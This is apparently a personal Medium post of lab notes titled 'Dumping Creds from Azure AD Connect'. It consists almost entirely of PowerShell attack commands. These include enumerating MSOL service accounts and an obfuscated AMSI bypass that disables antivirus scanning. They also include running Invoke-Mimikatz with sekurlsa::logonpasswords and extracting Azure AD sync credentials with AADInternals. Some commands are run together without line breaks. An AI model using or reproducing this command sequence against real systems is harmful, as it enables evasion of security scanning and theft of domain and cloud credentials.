Dumping Creds from Azure AD Connect

Get-ADUser -Filter {Name -like “*MSOL*”} -Properties * | Select-Object SamAccountName, MemberOf, DistinguishedName, Description | Format-List
S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command ‘“privilege::debug”’
Invoke-Mimikatz -Command ‘“sekurlsa::logonpasswords”’
(Get-Acl (Get-ADDomain).DistinguishedName).Access | Where {$_.IdentityReference -like “*MSOL*”}
Get-NetTCPConnection
Import-Module C:\AD\Tools\AADInternals-master\AADInternals-master\AADInternals.psd1Get-AADIntSyncCredentials

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Rich

Rich

15 Followers

I work various IT jobs & like Windows domain security as a hobby. Most of what’s here is my notes from work or the lab.